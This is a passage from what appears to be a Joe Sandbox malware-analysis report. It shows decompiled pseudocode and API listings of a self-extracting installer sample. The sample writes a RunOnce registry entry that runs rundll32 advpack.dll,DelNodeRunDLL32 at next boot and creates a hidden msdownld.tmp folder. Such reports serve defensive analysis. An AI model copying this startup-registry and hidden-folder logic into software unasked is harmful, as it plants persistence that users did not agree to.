                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                    • Opcode ID: f98b349f671ee7a89706c1ca8fa604d827ee4608f599d91d0160f42e5408e47b
                                                                                                                                                                                                    • Instruction ID: c6d7328bdeb671c67b30a157d7ee5206ebc6a55fbf14434c31bf52769aa29ccd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f98b349f671ee7a89706c1ca8fa604d827ee4608f599d91d0160f42e5408e47b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D90026425150047E6505B709D1945979B15F8D612BC19460A019C4894DF6040C09522
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E0017202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				void* _v532;
                                                                                                                                                                                                    				int _v536;
                                                                                                                                                                                                    				int _v540;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				struct HINSTANCE__* _t46;
                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				void _t56;
                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				intOrPtr* _t81;
                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t79 = __edx;
                                                                                                                                                                                                    				_t28 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                    				_t84 = 0x104;
                                                                                                                                                                                                    				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                    				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                    				_t95 = _t94 + 0x18;
                                                                                                                                                                                                    				_t66 = 0;
                                                                                                                                                                                                    				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                    					return E00176CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(_t86);
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E0017171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                    					_t95 = _t95 + 0x10;
                                                                                                                                                                                                    					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t87 = _t87 + 1;
                                                                                                                                                                                                    					if(_t87 < 0xc8) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t87 != 0xc8) {
                                                                                                                                                                                                    					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                    					_t79 = _t84;
                                                                                                                                                                                                    					E0017658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                    					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                    					_t84 = _t46;
                                                                                                                                                                                                    					if(_t84 == 0) {
                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x179a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                    							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							_pop(_t86);
                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						_t72 =  &_v268;
                                                                                                                                                                                                    						_t80 = _t72 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t49 =  *_t72;
                                                                                                                                                                                                    							_t72 = _t72 + 1;
                                                                                                                                                                                                    						} while (_t49 != 0);
                                                                                                                                                                                                    						_t73 = _t72 - _t80;
                                                                                                                                                                                                    						_t81 = 0x1791e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t50 =  *_t81;
                                                                                                                                                                                                    							_t81 = _t81 + 1;
                                                                                                                                                                                                    						} while (_t50 != 0);
                                                                                                                                                                                                    						_t84 = _t73 + 0x50 + _t81 - 0x1791e5;
                                                                                                                                                                                                    						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1791e5);
                                                                                                                                                                                                    						if(_t90 != 0) {
                                                                                                                                                                                                    							 *0x178580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                    							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								_t54 = "%s /D:%s";
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                    							E0017171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                    							_t75 = _t90;
                                                                                                                                                                                                    							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                    							_t79 = _t23;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t56 =  *_t75;
                                                                                                                                                                                                    								_t75 = _t75 + 1;
                                                                                                                                                                                                    							} while (_t56 != 0);
                                                                                                                                                                                                    							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                    							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                    							RegCloseKey(_v532); // executed
                                                                                                                                                                                                    							_t36 = LocalFree(_t90);
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t79 = 0x4b5;
                                                                                                                                                                                                    						E001744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                    					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                    					FreeLibrary(_t84); // executed
                                                                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    						E0017658A( &_v268, 0x104, 0x171140);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    				 *0x178530 = _t66;
                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x0017202a
                                                                                                                                                                                                    0x00172035
                                                                                                                                                                                                    0x0017203c
                                                                                                                                                                                                    0x00172041
                                                                                                                                                                                                    0x00172050
                                                                                                                                                                                                    0x0017205f
                                                                                                                                                                                                    0x00172064
                                                                                                                                                                                                    0x0017206f
                                                                                                                                                                                                    0x0017208c
                                                                                                                                                                                                    0x00172094
                                                                                                                                                                                                    0x00172257
                                                                                                                                                                                                    0x00172266
                                                                                                                                                                                                    0x00172266
                                                                                                                                                                                                    0x0017209a
                                                                                                                                                                                                    0x0017209b
                                                                                                                                                                                                    0x0017209d
                                                                                                                                                                                                    0x001720aa
                                                                                                                                                                                                    0x001720af
                                                                                                                                                                                                    0x001720c9
                                                                                                                                                                                                    0x001720d1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001720d3
                                                                                                                                                                                                    0x001720da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001720da
                                                                                                                                                                                                    0x001720e2
                                                                                                                                                                                                    0x00172103
                                                                                                                                                                                                    0x0017210e
                                                                                                                                                                                                    0x00172116
                                                                                                                                                                                                    0x00172122
                                                                                                                                                                                                    0x00172128
                                                                                                                                                                                                    0x0017212c
                                                                                                                                                                                                    0x00172179
                                                                                                                                                                                                    0x00172194
                                                                                                                                                                                                    0x001721de
                                                                                                                                                                                                    0x001721e4
                                                                                                                                                                                                    0x00172256
                                                                                                                                                                                                    0x00172256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172256
                                                                                                                                                                                                    0x00172196
                                                                                                                                                                                                    0x00172196
                                                                                                                                                                                                    0x0017219c
                                                                                                                                                                                                    0x0017219f
                                                                                                                                                                                                    0x0017219f
                                                                                                                                                                                                    0x001721a1
                                                                                                                                                                                                    0x001721a2
                                                                                                                                                                                                    0x001721a6
                                                                                                                                                                                                    0x001721a8
                                                                                                                                                                                                    0x001721b0
                                                                                                                                                                                                    0x001721b0
                                                                                                                                                                                                    0x001721b2
                                                                                                                                                                                                    0x001721b3
                                                                                                                                                                                                    0x001721bc
                                                                                                                                                                                                    0x001721c7
                                                                                                                                                                                                    0x001721cb
                                                                                                                                                                                                    0x001721f1
                                                                                                                                                                                                    0x001721f6
                                                                                                                                                                                                    0x001721fd
                                                                                                                                                                                                    0x001721ff
                                                                                                                                                                                                    0x001721ff
                                                                                                                                                                                                    0x00172204
                                                                                                                                                                                                    0x00172213
                                                                                                                                                                                                    0x00172218
                                                                                                                                                                                                    0x0017221d
                                                                                                                                                                                                    0x0017221d
                                                                                                                                                                                                    0x00172220
                                                                                                                                                                                                    0x00172220
                                                                                                                                                                                                    0x00172222
                                                                                                                                                                                                    0x00172223
                                                                                                                                                                                                    0x00172229
                                                                                                                                                                                                    0x0017223d
                                                                                                                                                                                                    0x00172249
                                                                                                                                                                                                    0x00172250
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172250
                                                                                                                                                                                                    0x001721d2
                                                                                                                                                                                                    0x001721d9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001721d9
                                                                                                                                                                                                    0x0017213a
                                                                                                                                                                                                    0x00172141
                                                                                                                                                                                                    0x00172144
                                                                                                                                                                                                    0x0017214c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172163
                                                                                                                                                                                                    0x00172172
                                                                                                                                                                                                    0x00172172
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172163
                                                                                                                                                                                                    0x001720ea
                                                                                                                                                                                                    0x001720f0
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00172050
                                                                                                                                                                                                    • memset.MSVCRT ref: 0017205F
                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0017208C
                                                                                                                                                                                                      • Part of subcall function 0017171E: _vsnprintf.MSVCRT ref: 00171750
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001720C9
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001720EA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00172103
                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00172122
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00172134
                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00172144
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0017215B
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0017218C
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001721C1
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001721E4
                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0017223D
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00172249
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00172250
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                    • API String ID: 178549006-3765599613
                                                                                                                                                                                                    • Opcode ID: 9c05a136b571819b1486d25573e4655dc331c7310f3117d12d38fab55d408efb
                                                                                                                                                                                                    • Instruction ID: fb8fa5e8662dbb2707525a74ff06320d7e1bd49af6ebd23b8aa98185c53427df
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c05a136b571819b1486d25573e4655dc331c7310f3117d12d38fab55d408efb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8551D371A40214ABDB209B64DC4DFEB7B7CEF94700F4081A8FA4DE6551DB719ECA8B60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 232 1755a0-1755d9 call 17468f LocalAlloc 235 1755fd-17560c call 17468f 232->235 236 1755db-1755f1 call 1744b9 call 176285 232->236 241 175632-175643 lstrcmpA 235->241 242 17560e-175630 call 1744b9 LocalFree 235->242 248 1755f6-1755f8 236->248 246 175645 241->246 247 17564b-175659 LocalFree 241->247 242->248 246->247 250 175696-17569c 247->250 251 17565b-17565d 247->251 252 1758b7-1758c7 call 176ce0 248->252 253 1756a2-1756a8 250->253 254 17589f-1758b5 call 176517 250->254 255 17565f-175667 251->255 256 175669 251->256 253->254 259 1756ae-1756c1 GetTempPathA 253->259 254->252 255->256 260 17566b-17567a call 175467 255->260 256->260 263 1756f3-175711 call 171781 259->263 264 1756c3-1756c9 call 175467 259->264 269 175680-175691 call 1744b9 260->269 270 17589b-17589d 260->270 274 175717-175729 GetDriveTypeA 263->274 275 17586c-175890 GetWindowsDirectoryA call 17597d 263->275 272 1756ce-1756d0 264->272 269->248 270->252 272->270 276 1756d6-1756df call 172630 272->276 278 175730-175740 GetFileAttributesA 274->278 279 17572b-17572e 274->279 275->263 289 175896 275->289 276->263 290 1756e1-1756ed call 175467 276->290 282 175742-175745 278->282 283 17577e-17578f call 17597d 278->283 279->278 279->282 287 175747-17574f 282->287 288 17576b 282->288 295 1757b2-1757bf call 172630 283->295 296 175791-17579e call 172630 283->296 292 175771-175779 287->292 293 175751-175753 287->293 288->292 289->270 290->263 290->270 298 175864-175866 292->298 293->292 297 175755-175762 call 176952 293->297 307 1757d3-1757f8 call 17658a GetFileAttributesA 295->307 308 1757c1-1757cd GetWindowsDirectoryA 295->308 296->288 306 1757a0-1757b0 call 17597d 296->306 297->288 309 175764-175769 297->309 298->274 298->275 306->288 306->295 314 17580a 307->314 315 1757fa-175808 CreateDirectoryA 307->315 308->307 309->283 309->288 316 17580d-17580f 314->316 315->316 317 175827-17585c SetFileAttributesA call 171781 call 175467 316->317 318 175811-175825 316->318 317->270 323 17585e 317->323 318->298 323->298
                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E001755A0(void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t35;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                    				int _t44;
                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				int _t54;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				char _t60;
                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                    				char _t66;
                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				int _t70;
                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                    				int _t73;
                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                    				CHAR* _t88;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                    				_t2 = E0017468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                    				if(_t109 != 0) {
                                                                                                                                                                                                    					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                    					_t32 = E0017468F(_t82, _t109, 1);
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                    							 *0x179a30 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						_t35 =  *0x178b3e; // 0x0
                                                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                                                    						if(_t35 == 0) {
                                                                                                                                                                                                    							__eflags =  *0x178a24; // 0x0
                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                    								L46:
                                                                                                                                                                                                    								_t101 = 0x7d2;
                                                                                                                                                                                                    								_t36 = E00176517(_t82, 0x7d2, 0, E00173210, 0, 0);
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_t38 =  ~( ~_t36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0x179a30; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t109 = 0x1791e4;
                                                                                                                                                                                                    									_t40 = GetTempPathA(0x104, 0x1791e4);
                                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                    										_push(_t82);
                                                                                                                                                                                                    										E00171781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                    										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                    										if(_v268 <= 0x5a) {
                                                                                                                                                                                                    											do {
                                                                                                                                                                                                    												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                    												__eflags = _t109 - 6;
                                                                                                                                                                                                    												if(_t109 == 6) {
                                                                                                                                                                                                    													L22:
                                                                                                                                                                                                    													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                    													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L23;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													__eflags = _t109 - 3;
                                                                                                                                                                                                    													if(_t109 != 3) {
                                                                                                                                                                                                    														L23:
                                                                                                                                                                                                    														__eflags = _t109 - 2;
                                                                                                                                                                                                    														if(_t109 != 2) {
                                                                                                                                                                                                    															L28:
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															__eflags = _t66 - 0x41;
                                                                                                                                                                                                    															if(_t66 == 0x41) {
                                                                                                                                                                                                    																L29:
                                                                                                                                                                                                    																_t60 = _t66 + 1;
                                                                                                                                                                                                    																_v268 = _t60;
                                                                                                                                                                                                    																goto L42;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																__eflags = _t66 - 0x42;
                                                                                                                                                                                                    																if(_t66 == 0x42) {
                                                                                                                                                                                                    																	goto L29;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t68 = E00176952( &_v268);
                                                                                                                                                                                                    																	__eflags = _t68;
                                                                                                                                                                                                    																	if(_t68 == 0) {
                                                                                                                                                                                                    																		goto L28;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                    																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                    																			L30:
                                                                                                                                                                                                    																			_push(0);
                                                                                                                                                                                                    																			_t103 = 3;
                                                                                                                                                                                                    																			_t49 = E0017597D( &_v268, _t103, 1);
                                                                                                                                                                                                    																			__eflags = _t49;
                                                                                                                                                                                                    																			if(_t49 != 0) {
                                                                                                                                                                                                    																				L33:
                                                                                                                                                                                                    																				_t50 = E00172630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t50;
                                                                                                                                                                                                    																				if(_t50 != 0) {
                                                                                                                                                                                                    																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t88 =  &_v268;
                                                                                                                                                                                                    																				E0017658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                    																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                    																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                    																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                    																					__eflags = _t54;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				__eflags = _t54;
                                                                                                                                                                                                    																				if(_t54 != 0) {
                                                                                                                                                                                                    																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                    																					_push(_t88);
                                                                                                                                                                                                    																					_t109 = 0x1791e4;
                                                                                                                                                                                                    																					E00171781(0x1791e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                    																					_t101 = 1;
                                                                                                                                                                                                    																					_t59 = E00175467(0x1791e4, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t59;
                                                                                                                                                                                                    																					if(_t59 != 0) {
                                                                                                                                                                                                    																						goto L45;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						_t60 = _v268;
                                                                                                                                                                                                    																						goto L42;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t60 = _v268 + 1;
                                                                                                                                                                                                    																					_v265 = 0;
                                                                                                                                                                                                    																					_v268 = _t60;
                                                                                                                                                                                                    																					goto L42;
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				_t65 = E00172630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t65;
                                                                                                                                                                                                    																				if(_t65 != 0) {
                                                                                                                                                                                                    																					goto L28;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t67 = E0017597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t67;
                                                                                                                                                                                                    																					if(_t67 == 0) {
                                                                                                                                                                                                    																						goto L28;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						goto L33;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			goto L28;
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L22;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L47;
                                                                                                                                                                                                    												L42:
                                                                                                                                                                                                    												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                    											} while (_t60 <= 0x5a);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L43;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t101 = 1;
                                                                                                                                                                                                    										_t69 = E00175467(0x1791e4, 1, 3); // executed
                                                                                                                                                                                                    										__eflags = _t69;
                                                                                                                                                                                                    										if(_t69 != 0) {
                                                                                                                                                                                                    											goto L45;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t82 = 0x1791e4;
                                                                                                                                                                                                    											_t70 = E00172630(0, 0x1791e4, 1);
                                                                                                                                                                                                    											__eflags = _t70;
                                                                                                                                                                                                    											if(_t70 != 0) {
                                                                                                                                                                                                    												goto L19;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t101 = 1;
                                                                                                                                                                                                    												_t82 = 0x1791e4;
                                                                                                                                                                                                    												_t71 = E00175467(0x1791e4, 1, 1);
                                                                                                                                                                                                    												__eflags = _t71;
                                                                                                                                                                                                    												if(_t71 != 0) {
                                                                                                                                                                                                    													goto L45;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													do {
                                                                                                                                                                                                    														goto L19;
                                                                                                                                                                                                    														L43:
                                                                                                                                                                                                    														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    														_push(4);
                                                                                                                                                                                                    														_t101 = 3;
                                                                                                                                                                                                    														_t82 =  &_v268;
                                                                                                                                                                                                    														_t44 = E0017597D(_t82, _t101, 1);
                                                                                                                                                                                                    														__eflags = _t44;
                                                                                                                                                                                                    													} while (_t44 != 0);
                                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                    							if(_t35 != 0x5c) {
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								_t72 = 1;
